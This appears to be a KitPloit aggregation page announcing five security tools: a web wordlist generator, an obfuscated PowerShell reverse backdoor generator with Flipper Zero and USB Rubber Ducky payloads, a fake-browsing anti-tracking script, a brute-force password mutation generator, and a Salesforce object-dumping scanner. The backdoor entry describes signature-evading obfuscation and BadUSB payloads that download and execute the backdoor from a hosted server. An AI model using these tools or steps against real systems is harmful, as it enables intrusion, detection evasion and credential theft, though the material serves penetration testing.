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☐ β˜† βœ‡ KitPloit - PenTest Tools!

WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R β€” February 15th 2024 at 11:30

WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.

  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.


From Git
git clone
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 -d

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d -o

-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.

☐ β˜† βœ‡ KitPloit - PenTest Tools!

Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads

By: (Unknown) β€” February 11th 2023 at 11:30

Reverse backdoor written in Powershell and obfuscated with Python. Allowing the backdoor to have a new signature after every run. Also can generate auto run scripts for Flipper Zero and USB Rubber Ducky.

usage: [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL convers ion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory


  • Hak5 Rubber Ducky payload
  • Flipper Zero payload
  • Download Files from remote system
  • Fetch target computers public IP address
  • List local users
  • Find Intresting Files
  • Get OS Information
  • Get BIOS Information
  • Get Anti-Virus Status
  • Get Active TCP Clients
  • Checks for common pentesting software installed

Standard backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\ --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener use CTRL+BREAK to stop

A file in the current working directory will be created called backdoor.ps1

Bad USB/ USB Rubber Ducky attacks

When using any of these attacks you will be opening up a HTTP server hosting the backdoor. Once the backdoor is retrieved the HTTP server will be shutdown.


  • Execute -- Execute the backdoor
  • BindAndExecute -- Place the backdoor in temp, bind the backdoor to startup and then execute it.

Flipper Zero Backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\ --flipper powershell_backdoor.txt --payload execute
[*] Started HTTP server hosting file:
[*] Starting Backdoor Listener use CTRL+BREAK to stop

Place the text file you specified (e.g: powershell_backdoor.txt) into your flipper zero. When the payload is executed it will download and execute backdoor.ps1

Usb Rubber Ducky Backdoor

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\ --ducky --payload BindAndExecute
[*] Started HTTP server hosting file:
[*] Starting Backdoor Listener use CTRL+BREAK to stop

A file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed it will download and execute backdoor.ps1

Backdoor Execution

Tested on Windows 11, Windows 10 and Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
└─PS> ./backdoor.ps1

To Do

  • Add Standard Backdoor
  • Find Writeable Directories
  • Get Windows Update Status

Output of 5 obfuscations/Runs


☐ β˜† βœ‡ KitPloit - PenTest Tools!

PartyLoud - A Simple Tool To Generate Fake Web Browsing And Mitigate Tracking

By: (Unknown) β€” October 20th 2022 at 11:30

PartyLoud is a highly configurable and straightforward free tool that helps you prevent tracking directly from your linux terminal, no special skills required. Once started, you can forget it is running. It provides several flags; each flag lets you customize your experience and change PartyLoud behaviour according to your needs.

  • Simple. 3 files only, no installation required, just clone this repo an you're ready to go.
  • Powerful. Thread-based navigation.
  • Stealthy. Optimized to emulate user navigation.
  • Portable. You can use this script on every unix-based OS.

This project was inspired by

How It Works

  1. URLs and keywords are loaded (either from partyloud.conf and badwords or from user-defined files)
  2. If proxy flag has been used, proxy config will be tested
  3. For each URL in ULR-list a thread is started, each thread as an user agent associated
  4. Each thread will start by sending an HTTP request to the given URL
  5. The response if filtered using the keywords in order to prevent 404s and malformed URLs
  6. A new URL is choosen from the list generated after filering
  7. Current thread sleeps for a random time
  8. Actions from 4 to 7 are repeated using the new URL until user send kill signal (CTRL-C or enter key)


  • Configurable urls list and blocklist
  • Random DNS Mode : each request is done on a different DNS Server
  • Multi-threaded request engine (# of thread are equal to # of urls in partyloud.conf)
  • Error recovery mechanism to protect Engines from failures
  • Spoofed User Agent prevent from fingerprinting (each engine has a different user agent)
  • Dynamic UI


Clone the repository:

git clone

Navigate to the directory and make the script executable:

cd PartyLoud
chmod +x

Run 'partyloud':



Usage: ./ [options...]

-d --dns <file> DNS Servers are sourced from specified FILE,
each request will use a different DNS Server
in the list
-l --url-list <file> read URL list from specified FILE
-b --blocklist <file> read blocklist from specified FILE
-p --http-proxy <http://ip:port> set a HTTP proxy
-s --https-proxy <https://ip:port> set a HTTPS proxy
-n --no-wait disable wait between one request and an other
-h --help dispaly this help
To stop the script press either enter or CRTL-C

File Specifications

In current release there is no input-validation on files.
If you find bugs or have suggestions on how to improve this features please help me by opening issues on GitHub


If you don’t have special needs , default config files are just fine to get you started.

Default files are located in:

Please note that file name and extension are not important, just content of files matter

badwords - Keywords-based blocklist

badwords is a keywords-based blocklist used to filter non-HTML content, images, document and so on.
The default config as been created after several weeks of testing. If you really think you need a custom blocklist, my suggestion is to start by copy and modifying default config according to your needs.
Here are some hints on how to create a great blocklist file:

Use only ASCII chars Define one-site-only rules
Try to keep the rules as general as possible Define case-sensitive rules
Prefer relative path Place more than one rule per line

partyloud.conf - ULR List

partyloud.conf is a ULR List used as starting point for fake navigation generators.
The goal here is to create a good list of sites containing a lot of URLs.
Aside suggesting you not to use google, youtube and social networks related links, I've really no hints for you.

Note #1 - To work properly the URLs must be well-formed
Note #2 - Even if the file contains 1000 lines only 10 are used (first 10, working on randomness)
Note #3 - Only one URL per line is allowed

DNSList - DNS List

DNSList is a List of DNS used as argument for random DNS feature. Random DNS is not enable by default, so the β€œdefault file” is really just a guide line and a test used while developing the function to se if everything was working as expected.
The only suggestion here is to add as much address as possible to increase randomness.

Note #1 - Only one address per line is allowed

☐ β˜† βœ‡ KitPloit - PenTest Tools!

Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns

By: (Unknown) β€” September 28th 2022 at 20:31

psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.

Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:


The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
{'a' : '@'},
{'b' : '8'},
{'e' : '3'},
{'g' : ['9', '6']},
{'i' : ['1', '!']},
{'o' : '0'},
{'s' : ['$', '5']},
{'t' : '7'}


When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?


No special requirements. Just clone the repo and make the script executable:

git clone
cd ./psudohash
chmod +x


./ [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

  1. Combining options --years and --append-numbering with a --numbering-limit β‰₯ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
  2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.


I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.

☐ β˜† βœ‡ KitPloit - PenTest Tools!

Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go

By: (Unknown) β€” August 4th 2022 at 12:30

A fast tool to scan SAAS,PAAS App written in Go

SAAS App Support :

  • salesforce
  • contentful (next version)

Note flag -o output not working

install : golang 1.18Ver

go install -v
go install -v


cirrusgo --help
  ______ _                           ______
/ ____/(_)_____ _____ __ __ _____ / ____/____
/ / / // ___// ___// / / // ___// / __ / __ \
/ /___ / // / / / / /_/ /(__ )/ /_/ // /_/ /
\____//_//_/ /_/ \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL> Define single URL to fuzz
-l, --list Show App List
-c, --check only check endpoint
-V, --version Show current version
-h, --help Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL> Define single URL
-c, --check only check endpoint
-lobj, --listobj pull the object list.
-gobj --getobj pull the object.
-obj --objects set the object name. Default value is "User" object.
Juicy Objects: Case,Account,User,Contact,Document,Cont
-gre --getrecord pull the Record id.
-re --recordid set the recode id to dump the record
-cw --chkWritable check all Writable objects
-f, --full dump all pages of objects.
-H, --header <HEADER> Pass custom header to target
-proxy, --proxy <URL> Use proxy to fuzz

-o, --output <FILE> File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload Generator payload for test manual Default "ObjectList"

GetItems -obj set object
-page set page
-pages set pageSize
GetRecord -re set recoder id
WritableOBJ -obj set object
SearchObj -obj set object
-page set page
-pages set pageSize
AuraContext -fwuid set UID
-App set AppName
-markup set markup
ObjectList no options
Dump no options
-h, --help Display its help

Example :

cirrusgo salesforce -u https://loclhost -gobj


cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirusgo salesforce -u https://localhost/ -cw
